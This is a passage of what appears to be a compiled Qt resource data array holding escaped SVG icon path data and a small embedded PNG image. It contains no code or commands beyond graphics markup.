9\\\n4.16 378.00 51.0\\\n1 Z\\x22 />\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x22\\xdf\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22?>\\x0a\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x0a\\x09\\x09\\\n\\x0a\\\n\\x09\\x0a\\x09\\\n\\x0a\\x09\\x09\\x0a\\x09\\x0a\\x09<\\\npath\\x0a\\x09\\x09d=\\x22M70.71\\\n19 37C72.5068 37\\\n 73.9619 35.5449\\\n 73.9619 33.75C7\\\n3.9619 31.9551 7\\\n2.5068 30.5 70.7\\\n119 30.5C68.9169\\\n 30.5 67.4619 31\\\n.9551 67.4619 33\\\n.75C67.4619 35.5\\\n449 68.9169 37 7\\\n0.7119 
37Z\\x22\\x0a\\x09\\x09fi\\\nll=\\x22#FF9D0B\\x22\\x0a\\x09/>\\\n\\x0a\\x09\\x0a\\x09\\x0a\\x09\\\n\\x0a\\x09\\x0a\\x09\\x0a\\x0a\\\n\\x00\\x00\\x84\\x00\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a\\\n \\x0a \\x0a \\x0a \\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 215.77\\\n896,180.19599 c \\\n-0.005,-0.099 0.\\\n095,-0.1701 0.18\\\n549,-0.16048 0.5\\\n343,0.003 1.0688\\\n4,-0.002 1.60337\\\n,-10e-4 0.0755,-\\\n0.003 0.15343,0.\\\n017 0.20474,0.07\\\n77 0.13271,0.142\\\n5 0.26641,0.2839\\\n9 0.40109,0.4244\\\n7 0.058,0.0653 0\\\n.12457,0.13491 0\\\n.13049,0.22831 -\\\n0.0237,0.02 -0.0\\\n469,0.04 -0.0698\\\n,0.0602 -0.241,-\\\n0.1539 -0.38974,\\\n-0.42347 -0.6228\\\n4,-0.58951 -0.12\\\n926,-0.009 -0.25\\\n926,0.005 -0.388\\\n76,0.001 0.33103\\\n,0.36449 0.62827\\\n,0.76087 0.96992\\\n,1.11574 0.17193\\\n,0.15668 0.0787,\\\n0.41233 0.0999,0\\\n.61786 0.0101,0.\\\n203 -0.26049,0.2\\\n0553 -0.37889,0.\\\n12403 -0.0641,-0\\\n.14529 -0.0202,-\\\n0.31488 -0.0353,\\\n-0.47029 -0.5683\\\n3,-0.004 -1.1366\\\n6,-0.003 -1.705,\\\n0 -0.008,0.15971\\\n 0.018,0.32373 -\\\n0.0269,0.47965 -\\\n0.12556,0.0592 -\\\n0.36335,0.0494 -\\\n0.36828,-0.13567\\\n -0.003,-0.59052\\\n 0.003,-1.18155 \\\n7.4e-4,-1.77232 \\\nm 0.53996,0.3692\\\n9 c -0.11174,0.0\\\n167 -0.20424,0.1\\\n2175 -0.20276,0.\\\n23895 -0.0104,0.\\\n15415 0.13937,0.\\\n31639 0.29378,0.\\\n27767 0.10114,-0\\\n.0157 0.16231,-0\\\n.11796 0.18205,-\\\n0.21313 0.0281,-\\\n0.1582 -0.11692,\\\n-0.32044 -0.2730\\\n7,-0.30349 m 0.7\\\n8861,0.022 c -0.\\\n12111,0.0445 -0.\\\n20029,0.18604 -0\\\n.15441,0.31487 0\\\n.0434,0.18301 0.\\\n32856,0.27059 0.\\\n41934,0.0808 0.1\\\n2605,-0.18149 -0\\\n.0656,-0.43891 -\\\n0.26493,-0.39562\\\n z\\x22\\x0a id=\\x22p\\\nath3\\x22\\x0a sty\\\nle=\\x22stroke-width\\\n:0.0249874\\x22 />\\x0a \\\n \\x0a\\\n \\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\\n\\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\\n\\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 209.51\\\n872,184.46914 c \\\n-0.0271,-0.27387\\\n 0.38826,-0.3482\\\n9 0.49877,-0.125\\\n8 0.054,0.13567 \\\n0.022,0.28704 0.\\\n0321,0.42954 -0.\\\n007,1.15498 0.01\\\n21,2.30995 -0.00\\\n9,3.46467 -0.159\\\n6,0.0448 -0.3295\\\n5,0.0326 -0.4913\\\n7,0.006 -0.0407,\\\n-0.0969 -0.0276,\\\n-0.20426 -0.0289\\\n,-0.30677 0.0128\\\n,-1.15599 -0.010\\\n1,-2.31197 -0.00\\\n1,-3.46796 z\\x22\\x0a \\\n id=\\x22path24\\x22\\\n\\x0a style=\\x22s\\\ntroke-width:0.02\\\n49874\\x22 />\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\\n\\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 206.14\\\n917,188.64886 c \\\n0.14899,-0.0248 \\\n0.30809,-0.0395 \\\n0.45388,0.009 0.\\\n0525,0.20503 0.0\\\n382,0.4341 0.011\\\n3,0.64343 -0.083\\\n6,0.21464 -0.473\\\n11,0.16857 -0.48\\\n791,-0.0727 0.00\\\n2,-0.19262 -0.02\\\n69,-0.39208 0.02\\\n27,-0.57989 z\\x22\\x0a \\\n id=\\x22path42\\\n\\x22\\x0a style=\\x22\\\nstroke-width:0.0\\\n249874\\x22 />\\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 206.85\\\n786,188.64304 c \\\n0.14455,-0.0243 \\\n0.29453,-0.0223 
\\\n0.43784,0.01 0.0\\\n607,0.38828 0.00\\\n7,0.78998 0.0207\\\n,1.18358 0.0178,\\\n0.17541 -0.16995\\\n,0.30753 -0.3275\\\n8,0.25969 -0.121\\\n11,-0.023 -0.219\\\n78,-0.13136 -0.2\\\n114,-0.26197 -0.\\\n004,-0.3369 9.9e\\\n-4,-0.67405 -0.0\\\n01,-1.0112 0.005\\\n,-0.0651 -0.005,\\\n-0.17187 0.0819,\\\n-0.17997 z\\x22\\x0a \\\n id=\\x22path43\\x22\\x0a \\\n style=\\x22str\\\noke-width:0.0249\\\n874\\x22 />\\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 208.20\\\n395,188.65595 c \\\n0.15022,-0.0534 \\\n0.32068,-0.0392 \\\n0.47386,-0.003 0\\\n.0348,0.13517 0.\\\n0274,0.27945 -0.\\\n002,0.41486 -0.1\\\n041,0.23439 -0.5\\\n3183,0.15263 -0.\\\n51234,-0.11896 0\\\n.005,-0.0957 -0.\\\n0269,-0.21566 0.\\\n0407,-0.29311 z\\x22\\\n\\x0a id=\\x22path\\\n45\\x22\\x0a style\\\n=\\x22stroke-width:0\\\n.0249874\\x22 />\\x0a \\\n \\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#000000\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 210.29\\\n771,188.63089 c \\\n0.15343,-0.0111 \\\n0.31179,-0.0203 \\\n0.463,0.0147 0.0\\\n237,0.0995 0.019\\\n2,0.20224 0.0185\\\n,0.30374 -0.004,\\\n1.32988 -0.002,2\\\n.66001 -0.01,3.9\\\n8938 -0.008,0.31\\\n867 -0.54267,0.3\\\n3057 -0.55599,0.\\\n0111 -0.0143,-1.\\\n39214 -0.0133,-2\\\n.78504 -0.0133,-\\\n4.17718 -0.003,-\\\n0.0638 0.0264,-0\\\n.13846 0.0977,-0\\\n.14175 z\\x22\\x0a \\\n id=\\x22path48\\x22\\x0a \\\n style=\\x22strok\\\ne-width:0.024987\\\n4\\x22 />\\x0a \\x0a \\\n \\x0a \\x0a \\x0a \\x0a \\x0a\\\n \\\n\\x0a \\x0a \\\n\\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a\\x0a\\\n\\x00\\x00\\x08\\x05\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\x0d\\x0a \\x0d\\x0a \\x0d\\x0a \\\n \\x0d\\x0a \\\n \\x0d\\x0a \\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x0e\\x98\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 ?>\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a<\\\n/svg>\\x0d\\x0a\\\n\\x00\\x00\\x0b\\x0d\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 ?>\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a<\\\npath fill=\\x22#0000\\\n00\\x22 opacity=\\x221.0\\\n0\\x22 d=\\x22 M 378.00 \\\n51.01 C 418.78 2\\\n3.85 468.01 9.58\\\n 517.01 10.91 C \\\n596.16 11.49 672\\\n.99 54.81 716.05\\\n 120.96 C 741.66\\\n 158.90 755.84 2\\\n04.28 757.14 249\\\n.99 C 703.76 250\\\n.04 650.39 249.9\\\n6 597.01 250.01 \\\nC 596.98 264.00 \\\n596.98 278.00 59\\\n7.01 291.99 C 65\\\n0.34 292.03 703.\\\n66 291.96 756.99\\\n 292.01 C 757.01\\\n 315.00 757.02 3\\\n38.00 757.00 360\\\n.99 C 703.67 361\\\n.03 650.34 360.9\\\n6 597.01 361.01 \\\nC 596.98 375.00 \\\n596.98 389.00 59\\\n7.01 402.99 C 65\\\n0.33 403.03 703.\\\n66 402.96 756.99\\\n 403.01 C 757.01\\\n 425.67 757.02 4\\\n48.33 756.99 470\\\n.99 C 703.77 471\\\n.18 650.54 470.6\\\n8 597.32 471.22 \\\nC 596.87 485.47 \\\n596.94 499.73 59\\\n7.01 513.99 C 65\\\n0.41 514.03 703.\\\n80 513.96 757.21\\\n 514.01 C 755.76\\\n 576.34 728.79 6\\\n37.68 684.30 681\\\n.30 C 662.85 703\\\n.59 636.37 720.5\\\n6 608.26 733.21 \\\nC 548.06 759.13 \\\n477.33 759.88 41\\\n7.00 734.00 C 35\\\n7.36 709.40 308.\\\n97 659.80 284.92\\\n 600.05 C 273.70\\\n 572.79 267.80 5\\\n43.44 266.85 514\\\n.01 C 320.23 513\\\n.96 373.61 514.0\\\n4 426.98 513.99 \\\nC 427.05 499.76 \\\n427.11 485.53 42\\\n6.76 471.31 C 37\\\n3.51 470.57 320.\\\n26 471.22 267.01\\\n 470.99 C 266.98\\\n 448.33 266.98 4\\\n25.67 267.01 403\\\n.01 
C 320.33 402\\\n.97 373.66 403.0\\\n3 426.99 402.99 \\\nC 427.02 388.99 \\\n427.02 375.00 42\\\n6.99 361.01 C 37\\\n3.66 360.97 320.\\\n33 361.03 267.01\\\n 360.99 C 266.99\\\n 337.99 266.98 3\\\n15.00 267.00 292\\\n.01 C 320.33 291\\\n.97 373.66 292.0\\\n4 426.99 291.99 \\\nC 427.02 277.99 \\\n427.02 264.00 42\\\n6.99 250.01 C 37\\\n3.59 249.97 320.\\\n19 250.04 266.79\\\n 249.99 C 268.28\\\n 170.77 311.75 9\\\n4.16 378.00 51.0\\\n1 Z\\x22 />\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x0dW\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a \\\n\\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a<\\\n/svg>\\x0a\\\n\\x00\\x00\\x0f\\xe5\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\\n\\x0d\\x0a\\x0d\\x0a\\\n<\\\npath\\x0d\\x0a \\\n fill=\\x22#040404\\x22\\x0d\\\n\\x0a opac\\\nity=\\x221\\x22\\x0d\\x0a \\\n d=\\x22m 494.34,\\\n266.52 c 12.28,-\\\n1.91 24.37,4.89 \\\n31.94,14.21 10.8\\\n1,13.32 15.96,30\\\n.08 20.49,46.37 \\\n8.49,35.78 11.33\\\n,72.52 16.21,108\\\n.9 2.76,26.53 6.\\\n17,53.23 14.33,7\\\n8.73 2.36,1.45 6\\\n.65,2.65 7.75,-0\\\n.7 7.09,-13.03 1\\\n0.13,-27.82 13.8\\\n,-42.1 5.63,-22.\\\n69 9.33,-46.8 22\\\n.38,-66.71 5.49,\\\n-8.29 14.37,-15.\\\n2 24.68,-15.46 1\\\n1.97,-2.43 23.92\\\n,3.92 31.88,12.4\\\n3 16.2,19.36 19.\\\n89,45.85 35.49,6\\\n5.56 3.7,4.45 8.\\\n89,7.58 14.74,8.\\\n19 28.3,0.18 56.\\\n62,-0.06 84.93,0\\\n.1 0.05,12.3 0.1\\\n2,24.62 -0.01,36\\\n.93 -29.99,0.04 \\\n-59.98,0.08 -89.\\\n96,-0.02 -17.22,\\\n-1.02 -32.33,-12\\\n.13 -42.23,-25.7\\\n2 -11.02,-15.8 -\\\n17.75,-34.03 -25\\\n.55,-51.46 -1.55\\\n,-3.17 -6.27,-4.\\\n08 -7.86,-0.47 -\\\n8.92,25.4 -12.13\\\n,52.43 -21.21,77\\\n.78 -6.09,17.07 \\\n-15.1,34.5 -31.9\\\n2,43.12 -8.31,3.\\\n53 -18.11,4.78 -\\\n26.88,2.38 -4.5,\\\n-3.13 -10.57,-4.\\\n46 -13.26,-9.64 \\\n-14.3,-18.52 -18\\\n.44,-42.37 -22.2\\\n9,-64.87 -6.04,-\\\n37.41 -8.64,-75.\\\n28 -14.11,-112.7\\\n9 -3.64,-19.62 -\\\n6.7,-39.66 -15,-\\\n57.98 -1.14,-1.1\\\n4 -2.05,-2.89 -3\\\n.68,-3.29 -2.26,\\\n0.82 -4.96,2.27 \\\n-5.05,4.98 -6.34\\\n,16.95 -9.65,35.\\\n08 -12,53.02 -5.\\\n58,34.07 -6.75,6\\\n8.63 -10.16,102.\\\n91 -2.83,36.27 -\\\n5.33,72.8 -13.46\\\n,108.38 -3.8,15.\\\n63 -8.22,31.82 -\\\n18.26,44.76 -7.5\\\n7,10.21 -21.94,1\\\n3.61 -33.77,9.58\\\n -7.63,-2.67 -13\\\n.14,-8.71 -18.53\\\n,-14.41 -12.28,-\\\n17.18 -17.72,-37\\\n.84 -23.1,-57.93\\\n -8.3,-35.64 -12\\\n.94,-71.97 -21.1\\\n5,-107.66 -2.57,\\\n-10.22 -4.78,-20\\\n.59 -8.8,-30.37 \\\n-1.48,-1.54 -2.9\\\n6,-4.11 -5.5,-3.\\\n12 -2.45,1.96 -3\\\n.15,5.1 -4.11,7.\\\n93 -7.06,19.2 -9\\\n.69,39.6 -13.47,\\\n59.59 -3.92,20.8\\\n1 -7.22,41.89 -1\\\n3.99,62.03 -4.39\\\n,12.15 -9.89,24.\\\n44 -19.94,33.01 \\\n-5.09,3.06 -10.3\\\n5,6.82 -16.63,6.\\\n53 -14.51,2.96 -\\\n28.91,-5.74 -36.\\\n96,-17.4 -12.46,\\\n-18.08 -16.96,-3\\\n9.97 -24.66,-60.\\\n18 -4.3,-10.84 -\\\n8.31,-22.88 -18.\\\n65,-29.48 -4.05,\\\n-3.52 -9.98,-1.8\\\n1 -14.8,-3.11 -2\\\n5.66,-0.23 -51.3\\\n2,0.07 -76.98,-0\\\n.12 -0.04,-12.31\\\n -0.12,-24.62 0.\\\n02,-36.92 26.65,\\\n-0.09 53.3,0.01 \\\n79.96,-0.04 7.66\\\n,0.28 15.68,0.01\\\n 22.79,3.36 15.3\\\n4,5.35 25.96,18.\\\n55 33.65,32.27 8\\\n.85,16.45 14,34.\\\n53 19.95,52.16 2\\\n.79,5.59 3.42,12\\\n.4 7.81,17.1 l 4\\\n.71,0.13 c 4.83,\\\n-7.37 6.04,-16.1\\\n2 8.59,-24.36 6.\\\n07,-25.55 9.02,-\\\n51.73 15.01,-77.\\\n29 4.02,-18.47 9\\\n.06,-37.23 19.82\\\n,-53.04 4.8,-7.6\\\n2 12.67,-12.78 2\\\n1,-15.85 3.91,-0\\\n.36 7.76,-1.17 1\\\n1.68,-1.43 
9.02,\\\n1.08 17.51,5.58 \\\n23.24,12.7 10.05\\\n,13.59 15.79,29.\\\n76 20.05,45.98 9\\\n.8,38.12 13.86,7\\\n7.41 23.14,115.6\\\n4 2.02,11.94 6.1\\\n4,23.41 10.52,34\\\n.65 0.94,2.51 3.\\\n4,3.57 5.96,2.98\\\n 2.82,-3.97 3.15\\\n,-8.84 4.53,-13.\\\n35 15.57,-79.43 \\\n12.18,-161.25 28\\\n.61,-240.58 4.2,\\\n-18.04 9.11,-36.\\\n64 20.26,-51.78 \\\n5.29,-8.07 14.28\\\n,-14.1 24.01,-14\\\n.76 z\\x22\\x0d\\x0a \\\n id=\\x22path1\\x22 />\\\n\\x0d\\x0a\\\n\\x00\\x00\\x0f\\xe5\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0d\\x0a\\\n\\x0d\\x0a\\x0d\\x0a\\\n<\\\npath\\x0d\\x0a \\\n fill=\\x22#ffffff\\x22\\x0d\\\n\\x0a opac\\\nity=\\x221\\x22\\x0d\\x0a \\\n d=\\x22m 494.34,\\\n266.52 c 12.28,-\\\n1.91 24.37,4.89 \\\n31.94,14.21 10.8\\\n1,13.32 15.96,30\\\n.08 20.49,46.37 \\\n8.49,35.78 11.33\\\n,72.52 16.21,108\\\n.9 2.76,26.53 6.\\\n17,53.23 14.33,7\\\n8.73 2.36,1.45 6\\\n.65,2.65 7.75,-0\\\n.7 7.09,-13.03 1\\\n0.13,-27.82 13.8\\\n,-42.1 5.63,-22.\\\n69 9.33,-46.8 22\\\n.38,-66.71 5.49,\\\n-8.29 14.37,-15.\\\n2 24.68,-15.46 1\\\n1.97,-2.43 23.92\\\n,3.92 31.88,12.4\\\n3 16.2,19.36 19.\\\n89,45.85 35.49,6\\\n5.56 3.7,4.45 8.\\\n89,7.58 14.74,8.\\\n19 28.3,0.18 56.\\\n62,-0.06 84.93,0\\\n.1 0.05,12.3 0.1\\\n2,24.62 -0.01,36\\\n.93 -29.99,0.04 \\\n-59.98,0.08 -89.\\\n96,-0.02 -17.22,\\\n-1.02 -32.33,-12\\\n.13 -42.23,-25.7\\\n2 -11.02,-15.8 -\\\n17.75,-34.03 -25\\\n.55,-51.46 -1.55\\\n,-3.17 -6.27,-4.\\\n08 -7.86,-0.47 -\\\n8.92,25.4 -12.13\\\n,52.43 -21.21,77\\\n.78 -6.09,17.07 \\\n-15.1,34.5 -31.9\\\n2,43.12 -8.31,3.\\\n53 -18.11,4.78 -\\\n26.88,2.38 -4.5,\\\n-3.13 -10.57,-4.\\\n46 -13.26,-9.64 \\\n-14.3,-18.52 -18\\\n.44,-42.37 -22.2\\\n9,-64.87 -6.04,-\\\n37.41 -8.64,-75.\\\n28 -14.11,-112.7\\\n9 -3.64,-19.62 -\\\n6.7,-39.66 -15,-\\\n57.98 -1.14,-1.1\\\n4 -2.05,-2.89 -3\\\n.68,-3.29 -2.26,\\\n0.82 -4.96,2.27 \\\n-5.05,4.98 -6.34\\\n,16.95 -9.65,35.\\\n08 -12,53.02 -5.\\\n58,34.07 -6.75,6\\\n8.63 -10.16,102.\\\n91 -2.83,36.27 -\\\n5.33,72.8 -13.46\\\n,108.38 -3.8,15.\\\n63 -8.22,31.82 -\\\n18.26,44.76 -7.5\\\n7,10.21 -21.94,1\\\n3.61 -33.77,9.58\\\n -7.63,-2.67 -13\\\n.14,-8.71 -18.53\\\n,-14.41 -12.28,-\\\n17.18 -17.72,-37\\\n.84 -23.1,-57.93\\\n -8.3,-35.64 -12\\\n.94,-71.97 -21.1\\\n5,-107.66 -2.57,\\\n-10.22 -4.78,-20\\\n.59 -8.8,-30.37 \\\n-1.48,-1.54 -2.9\\\n6,-4.11 -5.5,-3.\\\n12 -2.45,1.96 -3\\\n.15,5.1 -4.11,7.\\\n93 -7.06,19.2 -9\\\n.69,39.6 -13.47,\\\n59.59 -3.92,20.8\\\n1 -7.22,41.89 -1\\\n3.99,62.03 -4.39\\\n,12.15 -9.89,24.\\\n44 -19.94,33.01 \\\n-5.09,3.06 -10.3\\\n5,6.82 -16.63,6.\\\n53 -14.51,2.96 -\\\n28.91,-5.74 -36.\\\n96,-17.4 -12.46,\\\n-18.08 -16.96,-3\\\n9.97 -24.66,-60.\\\n18 -4.3,-10.84 -\\\n8.31,-22.88 -18.\\\n65,-29.48 -4.05,\\\n-3.52 -9.98,-1.8\\\n1 -14.8,-3.11 -2\\\n5.66,-0.23 -51.3\\\n2,0.07 -76.98,-0\\\n.12 -0.04,-12.31\\\n -0.12,-24.62 0.\\\n02,-36.92 26.65,\\\n-0.09 53.3,0.01 \\\n79.96,-0.04 7.66\\\n,0.28 15.68,0.01\\\n 22.79,3.36 15.3\\\n4,5.35 25.96,18.\\\n55 33.65,32.27 8\\\n.85,16.45 14,34.\\\n53 19.95,52.16 2\\\n.79,5.59 3.42,12\\\n.4 7.81,17.1 l 4\\\n.71,0.13 c 4.83,\\\n-7.37 6.04,-16.1\\\n2 8.59,-24.36 6.\\\n07,-25.55 9.02,-\\\n51.73 15.01,-77.\\\n29 4.02,-18.47 9\\\n.06,-37.23 19.82\\\n,-53.04 4.8,-7.6\\\n2 12.67,-12.78 2\\\n1,-15.85 3.91,-0\\\n.36 7.76,-1.17 1\\\n1.68,-1.43 9.02,\\\n1.08 17.51,5.58 \\\n23.24,12.7 10.05\\\n,13.59 15.79,29.\\\n76 20.05,45.98 9\\\n.8,38.12 13.86,7\\\n7.41 23.14,115.6\\\n4 2.02,11.94 6.1\\\n4,23.41 10.52,34\\\n.65 0.94,2.51 3.\\\n4,3.57 5.96,2.98\\\n 2.82,-3.97 
3.15\\\n,-8.84 4.53,-13.\\\n35 15.57,-79.43 \\\n12.18,-161.25 28\\\n.61,-240.58 4.2,\\\n-18.04 9.11,-36.\\\n64 20.26,-51.78 \\\n5.29,-8.07 14.28\\\n,-14.1 24.01,-14\\\n.76 z\\x22\\x0d\\x0a \\\n id=\\x22path1\\x22 />\\\n\\x0d\\x0a\\\n\\x00\\x00\\x05\\x08\\\n\\x89\\\nPNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\\n\\x00\\x00\\x1a\\x00\\x00\\x00\\x1a\\x08\\x06\\x00\\x00\\x00\\xa9JL\\xce\\\n\\x00\\x00\\x00\\x19tEXtSoftware\\\n\\x00Adobe ImageRead\\\nyq\\xc9e<\\x00\\x00\\x03\\x22iTXtXML\\\n:com.adobe.xmp\\x00\\x00\\\n\\x00\\x00\\x00 \\\n <\\\n/x:xmpmeta> \\x8d\\\n\\xf5\\xbc\\x97\\x00\\x00\\x01|IDATx\\xda\\xbcV\\x81\\\nm\\xc3 \\x10\\xc4U\\x07 \\x1bd\\x04W^\\xa0\\x9d \\\n\\xce\\x04u'\\xe8\\x0a\\xce\\x08\\x9e\\xc0\\xee\\x04q\\x07\\xb1\\xca\\\n&a\\x03\\xf7\\xa9\\xce\\xd2\\x97b\\xf3\\xe0\\xa8/!\\x12\\xc0\\\n\\x7f\\x7f\\x07\\xfcS\\xcc\\xf3\\xac\\xb8\\x15E\\xa1BVUU\\\nK\\xdd;5\\x8d!K\\xad\\x9b\\xa6\\xa9\\x0d\\xad\\xff\\xe3W\\\n\\x02D _\\xd4\\x95*l\\x86\\xc0\\x9eb@\\x0f*b\\\n`\\xb2\\x80\\x8c\\xd4^\\xd0F\\x8c\\x95X\\xb3iQF\\xe4\\\n\\xe4\\x06\\xb9F\\x8a\\xfc\\xec\\xcd]\\xa9\\xab\\x9d\\x8c4w\\xc8\\\nfD\\x8e4\\xdb\\x93\\x1a\\xa0<\\x80\\x1a\\x7fu\\x8cQT\\\n\\xba\\x00\\xf8Qe\\x98D\\xba\\x9f\\x05$M\\xb1\\x02\\x1c\\x9c\\\n\\xf7\\xfd>&0\\x99\\xf9^\\xb0\\xbd\\x13\\xd9\\xbfI'f\\\n\\xe4K\\xc3\\x98\\xcdw\\x05\\x92:\\x14\\x03-G\\xd8\\xbf\\x17\\\n\\x09\\x01-W\\xe0\\x10c\\xa4\\xd5>\\xd3I\\x87\\x81\\x22+\\\n3\\xd8<\\xe7\\x9c\\xba#\\xcb\\xd21\\xb315B@\\x06\\\n\\xfd\\x09}'\\x00\\xea\\xbco\\x8c\\x04\\xe8\\x03}\\xe3\\xe4C\\\n\\xbd1\\x1b \\xaeL\\xb4\\x90\\xba\\xf1|l\\x02\\x0dL\\x8a\\\n\\xde%V\\xd4\\x9b\\x8b'\\xa3\\xfb}qsH\\xbe=\\x1b\\\n\\x1fD\\xb9\\x8e>tY\\xf9\\xcadx#\\x87f\\xe3\\xd0\\\n\\xf4\\xacf\\x9di\\xed(\\xae\\xb0\\xe4\\xa0aQ.L?\\\n\\x11\\xb1\\xc5a91\\xb9\\x14\\x02\\x1a\\x92K9\\x98\\xf5\\x82\\\n\\xbbe\\x012f\\xbf\\x19\\xa0\\xbf\\x8b\\xfa5\\xf0n0\\xd8\\\n\\xf8\\x81@\\xec\\xee\\xc7\\xc9Z\\xbe[\\xabQY\\x8f\\x93{\\\nYl\\x8fR\\x8a\\xdb\\xaf\\x07J*#\\xbd7\\x99.\\xf6\\\n-\\xc0\\x00\\x03\\x80\\xc1\\xcd=\\xed\\xfe\\xf9\\x00\\x00\\x00\\x00I\\\nEND\\xaeB`\\x82\\\n\\x00\\x00\\x84\\x00\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 standalone=\\x22\\\nno\\x22?>\\x0a\\x0a\\\n \\x0a \\x0a \\x0a \\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#ffffff\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 215.77\\\n896,180.19599 c \\\n-0.005,-0.099 0.\\\n095,-0.1701 0.18\\\n549,-0.16048 0.5\\\n343,0.003 1.0688\\\n4,-0.002 1.60337\\\n,-10e-4 0.0755,-\\\n0.003 0.15343,0.\\\n017 0.20474,0.07\\\n77 0.13271,0.142\\\n5 0.26641,0.2839\\\n9 0.40109,0.4244\\\n7 0.058,0.0653 0\\\n.12457,0.13491 0\\\n.13049,0.22831 -\\\n0.0237,0.02 -0.0\\\n469,0.04 -0.0698\\\n,0.0602 -0.241,-\\\n0.1539 -0.38974,\\\n-0.42347 -0.6228\\\n4,-0.58951 -0.12\\\n926,-0.009 -0.25\\\n926,0.005 -0.388\\\n76,0.001 0.33103\\\n,0.36449 0.62827\\\n,0.76087 0.96992\\\n,1.11574 0.17193\\\n,0.15668 0.0787,\\\n0.41233 0.0999,0\\\n.61786 0.0101,0.\\\n203 -0.26049,0.2\\\n0553 -0.37889,0.\\\n12403 -0.0641,-0\\\n.14529 -0.0202,-\\\n0.31488 -0.0353,\\\n-0.47029 -0.5683\\\n3,-0.004 -1.1366\\\n6,-0.003 -1.705,\\\n0 -0.008,0.15971\\\n 0.018,0.32373 -\\\n0.0269,0.47965 -\\\n0.12556,0.0592 -\\\n0.36335,0.0494 -\\\n0.36828,-0.13567\\\n -0.003,-0.59052\\\n 0.003,-1.18155 \\\n7.4e-4,-1.77232 \\\nm 0.53996,0.3692\\\n9 c -0.11174,0.0\\\n167 -0.20424,0.1\\\n2175 -0.20276,0.\\\n23895 -0.0104,0.\\\n15415 0.13937,0.\\\n31639 0.29378,0.\\\n27767 0.10114,-0\\\n.0157 0.16231,-0\\\n.11796 0.18205,-\\\n0.21313 0.0281,-\\\n0.1582 -0.11692,\\\n-0.32044 -0.2730\\\n7,-0.30349 m 
0.7\\\n8861,0.022 c -0.\\\n12111,0.0445 -0.\\\n20029,0.18604 -0\\\n.15441,0.31487 0\\\n.0434,0.18301 0.\\\n32856,0.27059 0.\\\n41934,0.0808 0.1\\\n2605,-0.18149 -0\\\n.0656,-0.43891 -\\\n0.26493,-0.39562\\\n z\\x22\\x0a id=\\x22p\\\nath3\\x22\\x0a sty\\\nle=\\x22stroke-width\\\n:0.0249874\\x22 />\\x0a \\\n \\x0a\\\n \\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\\n\\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\\n\\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#ffffff\\x22\\x0a \\\n 